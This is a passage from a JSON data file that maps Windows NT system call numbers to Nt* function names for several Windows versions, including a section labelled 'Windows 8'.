\"NtQueryDebugFilterState\", \"290\": \"NtQueryDirectoryObject\", \"291\": \"NtQueryDriverEntryOrder\", \"292\": \"NtQueryEaFile\", \"293\": \"NtQueryFullAttributesFile\", \"294\": \"NtQueryInformationAtom\", \"295\": \"NtQueryInformationEnlistment\", \"296\": \"NtQueryInformationJobObject\", \"297\": \"NtQueryInformationPort\", \"298\": \"NtQueryInformationResourceManager\", \"299\": \"NtQueryInformationTransaction\", \"300\": \"NtQueryInformationTransactionManager\", \"301\": \"NtQueryInformationWorkerFactory\", \"302\": \"NtQueryInstallUILanguage\", \"303\": \"NtQueryIntervalProfile\", \"304\": \"NtQueryIoCompletion\", \"305\": \"NtQueryLicenseValue\", \"306\": \"NtQueryMultipleValueKey\", \"307\": \"NtQueryMutant\", \"308\": \"NtQueryOpenSubKeys\", \"309\": \"NtQueryOpenSubKeysEx\", \"310\": \"NtQueryPortInformationProcess\", \"311\": \"NtQueryQuotaInformationFile\", \"312\": \"NtQuerySecurityAttributesToken\", \"313\": \"NtQuerySecurityObject\", \"314\": \"NtQuerySemaphore\", \"315\": \"NtQuerySymbolicLinkObject\", \"316\": \"NtQuerySystemEnvironmentValue\", \"317\": \"NtQuerySystemEnvironmentValueEx\", \"318\": \"NtQuerySystemInformationEx\", \"319\": \"NtQueryTimerResolution\", \"320\": \"NtQueryWnfStateData\", \"321\": \"NtQueryWnfStateNameInformation\", \"322\": \"NtQueueApcThreadEx\", \"323\": \"NtRaiseException\", \"324\": \"NtRaiseHardError\", \"325\": \"NtReadOnlyEnlistment\", \"326\": \"NtRecoverEnlistment\", \"327\": \"NtRecoverResourceManager\", \"328\": \"NtRecoverTransactionManager\", \"329\": \"NtRegisterProtocolAddressInformation\", \"330\": \"NtRegisterThreadTerminatePort\", \"331\": \"NtReleaseKeyedEvent\", \"332\": \"NtReleaseWorkerFactoryWorker\", \"333\": \"NtRemoveIoCompletionEx\", \"334\": \"NtRemoveProcessDebug\", \"335\": \"NtRenameKey\", \"336\": \"NtRenameTransactionManager\", \"337\": \"NtReplaceKey\", \"338\": \"NtReplacePartitionUnit\", \"339\": \"NtReplyWaitReplyPort\", \"340\": \"NtRequestPort\", \"341\": \"NtResetEvent\", \"342\": \"NtResetWriteWatch\", \"343\": \"NtRestoreKey\", \"344\": \"NtResumeProcess\", \"345\": \"NtRollbackComplete\", \"346\": \"NtRollbackEnlistment\", \"347\": \"NtRollbackTransaction\", \"348\": \"NtRollforwardTransactionManager\", \"349\": \"NtSaveKey\", \"350\": \"NtSaveKeyEx\", \"351\": \"NtSaveMergedKeys\", \"352\": \"NtSecureConnectPort\", \"353\": \"NtSerializeBoot\", \"354\": \"NtSetBootEntryOrder\", \"355\": \"NtSetBootOptions\", \"356\": \"NtSetCachedSigningLevel\", \"357\": \"NtSetContextThread\", \"358\": \"NtSetDebugFilterState\", \"359\": \"NtSetDefaultHardErrorPort\", \"360\": \"NtSetDefaultLocale\", \"361\": \"NtSetDefaultUILanguage\", \"362\": \"NtSetDriverEntryOrder\", \"363\": \"NtSetEaFile\", \"364\": \"NtSetHighEventPair\", \"365\": \"NtSetHighWaitLowEventPair\", \"366\": \"NtSetIRTimer\", \"367\": \"NtSetInformationDebugObject\", \"368\": \"NtSetInformationEnlistment\", \"369\": \"NtSetInformationJobObject\", \"370\": \"NtSetInformationKey\", \"371\": \"NtSetInformationResourceManager\", \"372\": \"NtSetInformationToken\", \"373\": \"NtSetInformationTransaction\", \"374\": \"NtSetInformationTransactionManager\", \"375\": \"NtSetInformationVirtualMemory\", \"376\": \"NtSetInformationWorkerFactory\", \"377\": \"NtSetIntervalProfile\", \"378\": \"NtSetIoCompletion\", \"379\": \"NtSetIoCompletionEx\", \"380\": \"NtSetLdtEntries\", \"381\": \"NtSetLowEventPair\", \"382\": \"NtSetLowWaitHighEventPair\", \"383\": \"NtSetQuotaInformationFile\", \"384\": \"NtSetSecurityObject\", \"385\": \"NtSetSystemEnvironmentValue\", \"386\": \"NtSetSystemEnvironmentValueEx\", \"387\": \"NtSetSystemInformation\", \"388\": \"NtSetSystemPowerState\", \"389\": \"NtSetSystemTime\", \"390\": \"NtSetThreadExecutionState\", \"391\": \"NtSetTimerEx\", \"392\": \"NtSetTimerResolution\", \"393\": \"NtSetUuidSeed\", \"394\": \"NtSetVolumeInformationFile\", \"395\": \"NtShutdownSystem\", \"396\": \"NtShutdownWorkerFactory\", \"397\": \"NtSignalAndWaitForSingleObject\", \"398\": \"NtSinglePhaseReject\", \"399\": \"NtStartProfile\", \"400\": \"NtStopProfile\", \"401\": \"NtSubscribeWnfStateChange\", \"402\": \"NtSuspendProcess\", \"403\": \"NtSuspendThread\", \"404\": \"NtSystemDebugControl\", \"405\": \"NtTerminateJobObject\", \"406\": \"NtTestAlert\", \"407\": \"NtThawRegistry\", \"408\": \"NtThawTransactions\", \"409\": \"NtTraceControl\", \"410\": \"NtTranslateFilePath\", \"411\": \"NtUmsThreadYield\", \"412\": \"NtUnloadDriver\", \"413\": \"NtUnloadKey\", \"414\": \"NtUnloadKey2\", \"415\": \"NtUnloadKeyEx\", \"416\": \"NtUnlockFile\", \"417\": \"NtUnlockVirtualMemory\", \"418\": \"NtUnmapViewOfSectionEx\", \"419\": \"NtUnsubscribeWnfStateChange\", \"420\": \"NtUpdateWnfStateData\", \"421\": \"NtVdmControl\", \"422\": \"NtWaitForAlertByThreadId\", \"423\": \"NtWaitForDebugEvent\", \"424\": \"NtWaitForKeyedEvent\", \"425\": \"NtWaitForWnfNotifications\", \"426\": \"NtWaitForWorkViaWorkerFactory\", \"427\": \"NtWaitHighEventPair\", \"428\": \"NtWaitLowEventPair\"}, \"R2\": {\"0\": \"NtWorkerFactoryWorkerReady\", \"1\": \"NtAcceptConnectPort\", \"2\": \"NtMapUserPhysicalPagesScatter\", \"3\": \"NtWaitForSingleObject\", \"4\": \"NtCallbackReturn\", \"5\": \"NtReadFile\", \"6\": \"NtDeviceIoControlFile\", \"7\": \"NtWriteFile\", \"8\": \"NtRemoveIoCompletion\", \"9\": \"NtReleaseSemaphore\", \"10\": \"NtReplyWaitReceivePort\", \"11\": \"NtReplyPort\", \"12\": \"NtSetInformationThread\", \"13\": \"NtSetEvent\", \"14\": \"NtClose\", \"15\": \"NtQueryObject\", \"16\": \"NtQueryInformationFile\", \"17\": \"NtOpenKey\", \"18\": \"NtEnumerateValueKey\", \"19\": \"NtFindAtom\", \"20\": \"NtQueryDefaultLocale\", \"21\": \"NtQueryKey\", \"22\": \"NtQueryValueKey\", \"23\": \"NtAllocateVirtualMemory\", \"24\": \"NtQueryInformationProcess\", \"25\": \"NtWaitForMultipleObjects32\", \"26\": \"NtWriteFileGather\", \"27\": \"NtSetInformationProcess\", \"28\": \"NtCreateKey\", \"29\": \"NtFreeVirtualMemory\", \"30\": \"NtImpersonateClientOfPort\", \"31\": \"NtReleaseMutant\", \"32\": \"NtQueryInformationToken\", \"33\": \"NtRequestWaitReplyPort\", \"34\": \"NtQueryVirtualMemory\", \"35\": \"NtOpenThreadToken\", \"36\": \"NtQueryInformationThread\", \"37\": \"NtOpenProcess\", \"38\": \"NtSetInformationFile\", \"39\": \"NtMapViewOfSection\", \"40\": \"NtAccessCheckAndAuditAlarm\", \"41\": \"NtUnmapViewOfSection\", \"42\": \"NtReplyWaitReceivePortEx\", \"43\": \"NtTerminateProcess\", \"44\": \"NtSetEventBoostPriority\", \"45\": \"NtReadFileScatter\", \"46\": \"NtOpenThreadTokenEx\", \"47\": \"NtOpenProcessTokenEx\", \"48\": \"NtQueryPerformanceCounter\", \"49\": \"NtEnumerateKey\", \"50\": \"NtOpenFile\", \"51\": \"NtDelayExecution\", \"52\": \"NtQueryDirectoryFile\", \"53\": \"NtQuerySystemInformation\", \"54\": \"NtOpenSection\", \"55\": \"NtQueryTimer\", \"56\": \"NtFsControlFile\", \"57\": \"NtWriteVirtualMemory\", \"58\": \"NtCloseObjectAuditAlarm\", \"59\": \"NtDuplicateObject\", \"60\": \"NtQueryAttributesFile\", \"61\": \"NtClearEvent\", \"62\": \"NtReadVirtualMemory\", \"63\": \"NtOpenEvent\", \"64\": \"NtAdjustPrivilegesToken\", \"65\": \"NtDuplicateToken\", \"66\": \"NtContinue\", \"67\": \"NtQueryDefaultUILanguage\", \"68\": \"NtQueueApcThread\", \"69\": \"NtYieldExecution\", \"70\": \"NtAddAtom\", \"71\": \"NtCreateEvent\", \"72\": \"NtQueryVolumeInformationFile\", \"73\": \"NtCreateSection\", \"74\": \"NtFlushBuffersFile\", \"75\": \"NtApphelpCacheControl\", \"76\": \"NtCreateProcessEx\", \"77\": \"NtCreateThread\", \"78\": \"NtIsProcessInJob\", \"79\": \"NtProtectVirtualMemory\", \"80\": \"NtQuerySection\", \"81\": \"NtResumeThread\", \"82\": \"NtTerminateThread\", \"83\": \"NtReadRequestData\", \"84\": \"NtCreateFile\", \"85\": \"NtQueryEvent\", \"86\": \"NtWriteRequestData\", \"87\": \"NtOpenDirectoryObject\", \"88\": \"NtAccessCheckByTypeAndAuditAlarm\", \"89\": \"NtQuerySystemTime\", \"90\": \"NtWaitForMultipleObjects\", \"91\": \"NtSetInformationObject\", \"92\": \"NtCancelIoFile\", \"93\": \"NtTraceEvent\", \"94\": \"NtPowerInformation\", \"95\": \"NtSetValueKey\", \"96\": \"NtCancelTimer\", \"97\": \"NtSetTimer\", \"98\": \"NtAccessCheck\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientOfPort\", \"130\": \"NtAlpcOpenSenderProcess\", \"131\": \"NtAlpcOpenSenderThread\", \"132\": \"NtAlpcQueryInformation\", \"133\": \"NtAlpcQueryInformationMessage\", \"134\": \"NtAlpcRevokeSecurityContext\", \"135\": \"NtAlpcSendWaitReceivePort\", \"136\": \"NtAlpcSetInformation\", \"137\": \"NtAreMappedFilesTheSame\", \"138\": \"NtAssignProcessToJobObject\", \"139\": \"NtAssociateWaitCompletionPacket\", \"140\": \"NtCancelIoFileEx\", \"141\": \"NtCancelSynchronousIoFile\", \"142\": \"NtCancelTimer2\", \"143\": \"NtCancelWaitCompletionPacket\", \"144\": \"NtCommitComplete\", \"145\": \"NtCommitEnlistment\", \"146\": \"NtCommitTransaction\", \"147\": \"NtCompactKeys\", \"148\": \"NtCompareTokens\", \"149\": \"NtCompleteConnectPort\", \"150\": \"NtCompressKey\", \"151\": \"NtConnectPort\", \"152\": \"NtCreateDebugObject\", \"153\": \"NtCreateDirectoryObject\", \"154\": \"NtCreateDirectoryObjectEx\", \"155\": \"NtCreateEnlistment\", \"156\": \"NtCreateEventPair\", \"157\": \"NtCreateIRTimer\", \"158\": \"NtCreateIoCompletion\", \"159\": \"NtCreateJobObject\", \"160\": \"NtCreateJobSet\", \"161\": \"NtCreateKeyTransacted\", \"162\": \"NtCreateKeyedEvent\", \"163\": \"NtCreateLowBoxToken\", \"164\": \"NtCreateMailslotFile\", \"165\": \"NtCreateMutant\", \"166\": \"NtCreateNamedPipeFile\", \"167\": \"NtCreatePagingFile\", \"168\": \"NtCreatePort\", \"169\": \"NtCreatePrivateNamespace\", \"170\": \"NtCreateProcess\", \"171\": \"NtCreateProfile\", \"172\": \"NtCreateProfileEx\", \"173\": \"NtCreateResourceManager\", \"174\": \"NtCreateSemaphore\", \"175\": \"NtCreateSymbolicLinkObject\", \"176\": \"NtCreateThreadEx\", \"177\": \"NtCreateTimer\", \"178\": \"NtCreateTimer2\", \"179\": \"NtCreateToken\", \"180\": \"NtCreateTokenEx\", \"181\": \"NtCreateTransaction\", \"182\": \"NtCreateTransactionManager\", \"183\": \"NtCreateUserProcess\", \"184\": \"NtCreateWaitCompletionPacket\", \"185\": \"NtCreateWaitablePort\", \"186\": \"NtCreateWnfStateName\", \"187\": \"NtCreateWorkerFactory\", \"188\": \"NtDebugActiveProcess\", \"189\": \"NtDebugContinue\", \"190\": \"NtDeleteAtom\", \"191\": \"NtDeleteBootEntry\", \"192\": \"NtDeleteDriverEntry\", \"193\": \"NtDeleteFile\", \"194\": \"NtDeleteKey\", \"195\": \"NtDeleteObjectAuditAlarm\", \"196\": \"NtDeletePrivateNamespace\", \"197\": \"NtDeleteValueKey\", \"198\": \"NtDeleteWnfStateData\", \"199\": \"NtDeleteWnfStateName\", \"200\": \"NtDisableLastKnownGood\", \"201\": \"NtDisplayString\", \"202\": \"NtDrawText\", \"203\": \"NtEnableLastKnownGood\", \"204\": \"NtEnumerateBootEntries\", \"205\": \"NtEnumerateDriverEntries\", \"206\": \"NtEnumerateSystemEnvironmentValuesEx\", \"207\": \"NtEnumerateTransactionObject\", \"208\": \"NtExtendSection\", \"209\": \"NtFilterBootOption\", \"210\": \"NtFilterToken\", \"211\": \"NtFilterTokenEx\", \"212\": \"NtFlushBuffersFileEx\", \"213\": \"NtFlushInstallUILanguage\", \"214\": \"NtFlushInstructionCache\", \"215\": \"NtFlushKey\", \"216\": \"NtFlushProcessWriteBuffers\", \"217\": \"NtFlushVirtualMemory\", \"218\": \"NtFlushWriteBuffer\", \"219\": \"NtFreeUserPhysicalPages\", \"220\": \"NtFreezeRegistry\", \"221\": \"NtFreezeTransactions\", \"222\": \"NtGetCachedSigningLevel\", \"223\": \"NtGetCompleteWnfStateSubscription\", \"224\": \"NtGetContextThread\", \"225\": \"NtGetCurrentProcessorNumber\", \"226\": \"NtGetDevicePowerState\", \"227\": \"NtGetMUIRegistryInfo\", \"228\": \"NtGetNextProcess\", \"229\": \"NtGetNextThread\", \"230\": \"NtGetNlsSectionPtr\", \"231\": \"NtGetNotificationResourceManager\", \"232\": \"NtGetWriteWatch\", \"233\": \"NtImpersonateAnonymousToken\", \"234\": \"NtImpersonateThread\", \"235\": \"NtInitializeNlsFiles\", \"236\": \"NtInitializeRegistry\", \"237\": \"NtInitiatePowerAction\", \"238\": \"NtIsSystemResumeAutomatic\", \"239\": \"NtIsUILanguageComitted\", \"240\": \"NtListenPort\", \"241\": \"NtLoadDriver\", \"242\": \"NtLoadKey\", \"243\": \"NtLoadKey2\", \"244\": \"NtLoadKeyEx\", \"245\": \"NtLockFile\", \"246\": \"NtLockProductActivationKeys\", \"247\": \"NtLockRegistryKey\", \"248\": \"NtLockVirtualMemory\", \"249\": \"NtMakePermanentObject\", \"250\": \"NtMakeTemporaryObject\", \"251\": \"NtMapCMFModule\", \"252\": \"NtMapUserPhysicalPages\", \"253\": \"NtModifyBootEntry\", \"254\": \"NtModifyDriverEntry\", \"255\": \"NtNotifyChangeDirectoryFile\", \"256\": \"NtNotifyChangeKey\", \"257\": \"NtNotifyChangeMultipleKeys\", \"258\": \"NtNotifyChangeSession\", \"259\": \"NtOpenEnlistment\", \"260\": \"NtOpenEventPair\", \"261\": \"NtOpenIoCompletion\", \"262\": \"NtOpenJobObject\", \"263\": \"NtOpenKeyEx\", \"264\": \"NtOpenKeyTransacted\", \"265\": \"NtOpenKeyTransactedEx\", \"266\": \"NtOpenKeyedEvent\", \"267\": \"NtOpenMutant\", \"268\": \"NtOpenObjectAuditAlarm\", \"269\": \"NtOpenPrivateNamespace\", \"270\": \"NtOpenProcessToken\", \"271\": \"NtOpenResourceManager\", \"272\": \"NtOpenSemaphore\", \"273\": \"NtOpenSession\", \"274\": \"NtOpenSymbolicLinkObject\", \"275\": \"NtOpenThread\", \"276\": \"NtOpenTimer\", \"277\": \"NtOpenTransaction\", \"278\": \"NtOpenTransactionManager\", \"279\": \"NtPlugPlayControl\", \"280\": \"NtPrePrepareComplete\", \"281\": \"NtPrePrepareEnlistment\", \"282\": \"NtPrepareComplete\", \"283\": \"NtPrepareEnlistment\", \"284\": \"NtPrivilegeCheck\", \"285\": \"NtPrivilegeObjectAuditAlarm\", \"286\": \"NtPrivilegedServiceAuditAlarm\", \"287\": \"NtPropagationComplete\", \"288\": \"NtPropagationFailed\", \"289\": \"NtPulseEvent\", \"290\": \"NtQueryBootEntryOrder\", \"291\": \"NtQueryBootOptions\", \"292\": \"NtQueryDebugFilterState\", \"293\": \"NtQueryDirectoryObject\", \"294\": \"NtQueryDriverEntryOrder\", \"295\": \"NtQueryEaFile\", \"296\": \"NtQueryFullAttributesFile\", \"297\": \"NtQueryInformationAtom\", \"298\": \"NtQueryInformationEnlistment\", \"299\": \"NtQueryInformationJobObject\", \"300\": \"NtQueryInformationPort\", \"301\": \"NtQueryInformationResourceManager\", \"302\": \"NtQueryInformationTransaction\", \"303\": \"NtQueryInformationTransactionManager\", \"304\": \"NtQueryInformationWorkerFactory\", \"305\": \"NtQueryInstallUILanguage\", \"306\": \"NtQueryIntervalProfile\", \"307\": \"NtQueryIoCompletion\", \"308\": \"NtQueryLicenseValue\", \"309\": \"NtQueryMultipleValueKey\", \"310\": \"NtQueryMutant\", \"311\": \"NtQueryOpenSubKeys\", \"312\": \"NtQueryOpenSubKeysEx\", \"313\": \"NtQueryPortInformationProcess\", \"314\": \"NtQueryQuotaInformationFile\", \"315\": \"NtQuerySecurityAttributesToken\", \"316\": \"NtQuerySecurityObject\", \"317\": \"NtQuerySemaphore\", \"318\": \"NtQuerySymbolicLinkObject\", \"319\": \"NtQuerySystemEnvironmentValue\", \"320\": \"NtQuerySystemEnvironmentValueEx\", \"321\": \"NtQuerySystemInformationEx\", \"322\": \"NtQueryTimerResolution\", \"323\": \"NtQueryWnfStateData\", \"324\": \"NtQueryWnfStateNameInformation\", \"325\": \"NtQueueApcThreadEx\", \"326\": \"NtRaiseException\", \"327\": \"NtRaiseHardError\", \"328\": \"NtReadOnlyEnlistment\", \"329\": \"NtRecoverEnlistment\", \"330\": \"NtRecoverResourceManager\", \"331\": \"NtRecoverTransactionManager\", \"332\": \"NtRegisterProtocolAddressInformation\", \"333\": \"NtRegisterThreadTerminatePort\", \"334\": \"NtReleaseKeyedEvent\", \"335\": \"NtReleaseWorkerFactoryWorker\", \"336\": \"NtRemoveIoCompletionEx\", \"337\": \"NtRemoveProcessDebug\", \"338\": \"NtRenameKey\", \"339\": \"NtRenameTransactionManager\", \"340\": \"NtReplaceKey\", \"341\": \"NtReplacePartitionUnit\", \"342\": \"NtReplyWaitReplyPort\", \"343\": \"NtRequestPort\", \"344\": \"NtResetEvent\", \"345\": \"NtResetWriteWatch\", \"346\": \"NtRestoreKey\", \"347\": \"NtResumeProcess\", \"348\": \"NtRollbackComplete\", \"349\": \"NtRollbackEnlistment\", \"350\": \"NtRollbackTransaction\", \"351\": \"NtRollforwardTransactionManager\", \"352\": \"NtSaveKey\", \"353\": \"NtSaveKeyEx\", \"354\": \"NtSaveMergedKeys\", \"355\": \"NtSecureConnectPort\", \"356\": \"NtSerializeBoot\", \"357\": \"NtSetBootEntryOrder\", \"358\": \"NtSetBootOptions\", \"359\": \"NtSetCachedSigningLevel\", \"360\": \"NtSetContextThread\", \"361\": \"NtSetDebugFilterState\", \"362\": \"NtSetDefaultHardErrorPort\", \"363\": \"NtSetDefaultLocale\", \"364\": \"NtSetDefaultUILanguage\", \"365\": \"NtSetDriverEntryOrder\", \"366\": \"NtSetEaFile\", \"367\": \"NtSetHighEventPair\", \"368\": \"NtSetHighWaitLowEventPair\", \"369\": \"NtSetIRTimer\", \"370\": \"NtSetInformationDebugObject\", \"371\": \"NtSetInformationEnlistment\", \"372\": \"NtSetInformationJobObject\", \"373\": \"NtSetInformationKey\", \"374\": \"NtSetInformationResourceManager\", \"375\": \"NtSetInformationToken\", \"376\": \"NtSetInformationTransaction\", \"377\": \"NtSetInformationTransactionManager\", \"378\": \"NtSetInformationVirtualMemory\", \"379\": \"NtSetInformationWorkerFactory\", \"380\": \"NtSetIntervalProfile\", \"381\": \"NtSetIoCompletion\", \"382\": \"NtSetIoCompletionEx\", \"383\": \"NtSetLdtEntries\", \"384\": \"NtSetLowEventPair\", \"385\": \"NtSetLowWaitHighEventPair\", \"386\": \"NtSetQuotaInformationFile\", \"387\": \"NtSetSecurityObject\", \"388\": \"NtSetSystemEnvironmentValue\", \"389\": \"NtSetSystemEnvironmentValueEx\", \"390\": \"NtSetSystemInformation\", \"391\": \"NtSetSystemPowerState\", \"392\": \"NtSetSystemTime\", \"393\": \"NtSetThreadExecutionState\", \"394\": \"NtSetTimer2\", \"395\": \"NtSetTimerEx\", \"396\": \"NtSetTimerResolution\", \"397\": \"NtSetUuidSeed\", \"398\": \"NtSetVolumeInformationFile\", \"399\": \"NtSetWnfProcessNotificationEvent\", \"400\": \"NtShutdownSystem\", \"401\": \"NtShutdownWorkerFactory\", \"402\": \"NtSignalAndWaitForSingleObject\", \"403\": \"NtSinglePhaseReject\", \"404\": \"NtStartProfile\", \"405\": \"NtStopProfile\", \"406\": \"NtSubscribeWnfStateChange\", \"407\": \"NtSuspendProcess\", \"408\": \"NtSuspendThread\", \"409\": \"NtSystemDebugControl\", \"410\": \"NtTerminateJobObject\", \"411\": \"NtTestAlert\", \"412\": \"NtThawRegistry\", \"413\": \"NtThawTransactions\", \"414\": \"NtTraceControl\", \"415\": \"NtTranslateFilePath\", \"416\": \"NtUmsThreadYield\", \"417\": \"NtUnloadDriver\", \"418\": \"NtUnloadKey\", \"419\": \"NtUnloadKey2\", \"420\": \"NtUnloadKeyEx\", \"421\": \"NtUnlockFile\", \"422\": \"NtUnlockVirtualMemory\", \"423\": \"NtUnmapViewOfSectionEx\", \"424\": \"NtUnsubscribeWnfStateChange\", \"425\": \"NtUpdateWnfStateData\", \"426\": \"NtVdmControl\", \"427\": \"NtWaitForAlertByThreadId\", \"428\": \"NtWaitForDebugEvent\", \"429\": \"NtWaitForKeyedEvent\", \"430\": \"NtWaitForWorkViaWorkerFactory\", \"431\": \"NtWaitHighEventPair\", \"432\": \"NtWaitLowEventPair\"}}, \"Windows 8\": {\"8.0\": {\"0\": \"NtWorkerFactoryWorkerReady\", \"1\": \"NtMapUserPhysicalPagesScatter\", \"2\": \"NtWaitForSingleObject\", \"3\": \"NtCallbackReturn\", \"4\": \"NtReadFile\", \"5\": \"NtDeviceIoControlFile\", \"6\": \"NtWriteFile\", \"7\": \"NtRemoveIoCompletion\", \"8\": \"NtReleaseSemaphore\", \"9\": \"NtReplyWaitReceivePort\", \"10\": \"NtReplyPort\", \"11\": \"NtSetInformationThread\", \"12\": \"NtSetEvent\", \"13\": \"NtClose\", \"14\": \"NtQueryObject\", \"15\": \"NtQueryInformationFile\", \"16\": \"NtOpenKey\", \"17\": \"NtEnumerateValueKey\", \"18\": \"NtFindAtom\", \"19\": \"NtQueryDefaultLocale\", \"20\": \"NtQueryKey\", \"21\": \"NtQueryValueKey\", \"22\": \"NtAllocateVirtualMemory\", \"23\": \"NtQueryInformationProcess\", \"24\": \"NtWaitForMultipleObjects32\", \"25\": \"NtWriteFileGather\", \"26\": \"NtSetInformationProcess\", \"27\": \"NtCreateKey\", \"28\": \"NtFreeVirtualMemory\", \"29\": \"NtImpersonateClientOfPort\", \"30\": \"NtReleaseMutant\", \"31\": \"NtQueryInformationToken\", \"32\": \"NtRequestWaitReplyPort\", \"33\": \"NtQueryVirtualMemory\", \"34\": \"NtOpenThreadToken\", \"35\": \"NtQueryInformationThread\", \"36\": \"NtOpenProcess\", \"37\": \"NtSetInformationFile\", \"38\": \"NtMapViewOfSection\", \"39\": \"NtAccessCheckAndAuditAlarm\", \"40\": \"NtUnmapViewOfSection\", \"41\": \"NtReplyWaitReceivePortEx\", \"42\": \"NtTerminateProcess\", \"43\": \"NtSetEventBoostPriority\", \"44\": \"NtReadFileScatter\", \"45\": \"NtOpenThreadTokenEx\", \"46\": \"NtOpenProcessTokenEx\", \"47\": \"NtQueryPerformanceCounter\", \"48\": \"NtEnumerateKey\", \"49\": \"NtOpenFile\", \"50\": \"NtDelayExecution\", \"51\": \"NtQueryDirectoryFile\", \"52\": \"NtQuerySystemInformation\", \"53\": \"NtOpenSection\", \"54\": \"NtQueryTimer\", \"55\": \"NtFsControlFile\", \"56\": \"NtWriteVirtualMemory\", \"57\": \"NtCloseObjectAuditAlarm\", \"58\": \"NtDuplicateObject\", \"59\": \"NtQueryAttributesFile\", \"60\": \"NtClearEvent\", \"61\": \"NtReadVirtualMemory\", \"62\": \"NtOpenEvent\", \"63\": \"NtAdjustPrivilegesToken\", \"64\": \"NtDuplicateToken\", \"65\": \"NtContinue\", \"66\": \"NtQueryDefaultUILanguage\", \"67\": \"NtQueueApcThread\", \"68\": \"NtYieldExecution\", \"69\": \"NtAddAtom\", \"70\": \"NtCreateEvent\", \"71\": \"NtQueryVolumeInformationFile\", \"72\": \"NtCreateSection\", \"73\": \"NtFlushBuffersFile\", \"74\": \"NtApphelpCacheControl\", \"75\": \"NtCreateProcessEx\", \"76\": \"NtCreateThread\", \"77\": \"NtIsProcessInJob\", \"78\": \"NtProtectVirtualMemory\", \"79\": \"NtQuerySection\", \"80\": \"NtResumeThread\", \"81\": \"NtTerminateThread\", \"82\": \"NtReadRequestData\", \"83\": \"NtCreateFile\", \"84\": \"NtQueryEvent\", \"85\": \"NtWriteRequestData\", \"86\": \"NtOpenDirectoryObject\", \"87\": \"NtAccessCheckByTypeAndAuditAlarm\", \"88\": \"NtQuerySystemTime\", \"89\": \"NtWaitForMultipleObjects\", \"90\": \"NtSetInformationObject\", \"91\": \"NtCancelIoFile\", \"92\": \"NtTraceEvent\", \"93\": \"NtPowerInformation\", \"94\": \"NtSetValueKey\", \"95\": \"NtCancelTimer\", \"96\": \"NtSetTimer\", \"97\": \"NtAcceptConnectPort\", \"98\": \"NtAccessCheck\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientOfPort\", \"130\": \"NtAlpcOpenSenderProcess\", \"131\": \"NtAlpcOpenSenderThread\", \"132\": \"NtAlpcQueryInformation\", \"133\": \"NtAlpcQueryInformationMessage\", \"134\": \"NtAlpcRevokeSecurityContext\", \"135\": \"NtAlpcSendWaitReceivePort\", \"136\": \"NtAlpcSetInformation\", \"137\": \"NtAreMappedFilesTheSame\", \"138\": \"NtAssignProcessToJobObject\", \"139\": \"NtAssociateWaitCompletionPacket\", \"140\": \"NtCancelIoFileEx\", \"141\": \"NtCancelSynchronousIoFile\", \"142\": \"NtCancelWaitCompletionPacket\", \"143\": \"NtCommitComplete\", \"144\": \"NtCommitEnlistment\", \"145\": \"NtCommitTransaction\", \"146\": \"NtCompactKeys\", \"147\": \"NtCompareTokens\", \"148\": \"NtCompleteConnectPort\", \"149\": \"NtCompressKey\", \"150\": \"NtConnectPort\", \"151\": \"NtCreateDebugObject\", \"152\": \"NtCreateDirectoryObject\", \"153\": \"NtCreateDirectoryObjectEx\", \"154\": \"NtCreateEnlistment\", \"155\": \"NtCreateEventPair\", \"156\": \"NtCreateIRTimer\", \"157\": \"NtCreateIoCompletion\", \"158\": \"NtCreateJobObject\", \"159\": \"NtCreateJobSet\", \"160\": \"NtCreateKeyTransacted\", \"161\": \"NtCreateKeyedEvent\", \"162\": \"NtCreateLowBoxToken\", \"163\": \"NtCreateMailslotFile\", \"164\": \"NtCreateMutant\", \"165\": \"NtCreateNamedPipeFile\", \"166\": \"NtCreatePagingFile\", \"167\": \"NtCreatePort\", \"168\": \"NtCreatePrivateNamespace\", \"169\": \"NtCreateProcess\", \"170\": \"NtCreateProfile\", 